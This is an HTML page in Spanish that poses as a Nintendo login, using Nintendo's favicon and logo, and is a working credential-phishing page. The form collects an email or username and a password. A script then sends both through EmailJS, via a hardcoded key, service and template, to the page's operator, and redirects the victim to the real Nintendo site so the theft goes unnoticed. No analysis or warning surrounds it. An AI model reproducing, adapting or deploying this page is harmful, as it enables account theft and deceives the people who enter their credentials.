<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Nintendo</title>
    <link rel="icon" href="https://www.nintendo.com/eu/media/images/01_website_elements/icons/favicon.png" type="image/png">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
    <style>
        body {
            background-color: #f2f2f2;
            color: #fff;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .form-container {
            background-color: #ffffff;
            padding: 10px;
            border-radius: 10px;
            width: 400px; /* Cambia este valor para ajustar el ancho */
            text-align: center;
            display: flex;
            flex-direction: column;
            align-items: center;
            border: 1px solid #e3e3e3;
            
            
            
            
        }
        input, button {
            width: 95%;
            margin: 5px 0;
            padding: 10px;
            border-radius: 5px;
            border: 2px solid #f2f2f2;
            font-family: 'Roboto', sans-serif;
        }
        button {
            background-color: #555;
            color: #fff;



        }



        .header-image {
            width: 300px; /* Cambia el tamaño a lo que prefieras */
            height: auto; /* Mantiene la proporción de la imagen */
            margin-bottom: 20px;
            display: inline-block;
        }






        .text-between {
            color: #000; /* Color del texto */
            margin-bottom: 20px; /* Espacio debajo del texto */
            font-size: 16px; /* Tamaño del texto */
            font-family: 'Roboto', sans-serif;
        }



        label {
            color: #000; /* Texto de las etiquetas en negro */
            text-align: left;
            width: 100%;
            margin-bottom: 5px;
            font-size: 14px;
            display: block;
            font-family: 'Roboto', sans-serif;
        }

    </style>
    <!-- Actualización a la nueva versión del SDK de EmailJS -->
    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
    <script>
        (function(){
            emailjs.init("WTBSDHI6pGlHer-mC");
        })();

        function sendMail() {
            const name = document.getElementById("name").value;
            const email = document.getElementById("email").value;

            const templateParams = {
                user_name: name,
                user_email: email
            };

            emailjs.send("service_ekintuo", "template_abeyzek", templateParams)
                .then(response => {
                    window.location.href = "https://www.nintendo.com/es-es/";
                })
                .catch(error => {
                    alert("Error al iniciar sesión", error);
                    console.error("Error:", error); // Muestra más detalles en la consola
                });
        }
    </script>
</head>
<body>
    <div class="form-container">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCqH-k3NsWT-gZKw-T-oye5FtSd-YOUGLRom3xzBfdgNWRDCu6mt2hVPKuYh9Hs2VjES3Dw25yCryWAVQ-tf0r7fwbkN7hq2mc1zzfnsiISYbfgPIxIogWEo11gzKNAn5zAkKTbz8axO-L3EShY4P_A_XVwyKrhcdXGFuWGZXYJOolIIrmK_4y8Eb2JIw/s320/nintendo-logo-nintendo-icon-transparent-free-png.png" alt="Encabezado" class="header-image">

        <p class="text-between">Iniciar sesión con una contraseña</p>

        <label for="name">Correo electrónico o nombre de acceso:</label>
        <input type="email" id="name" placeholder="Correo electrónico o nombre de acceso" required>
        <label for="email">Contraseña:</label>
        <input type="password" id="email" placeholder="Contraseña" required>
        <button onclick="sendMail()">Enviar</button>
    </div>
</body>
</html>
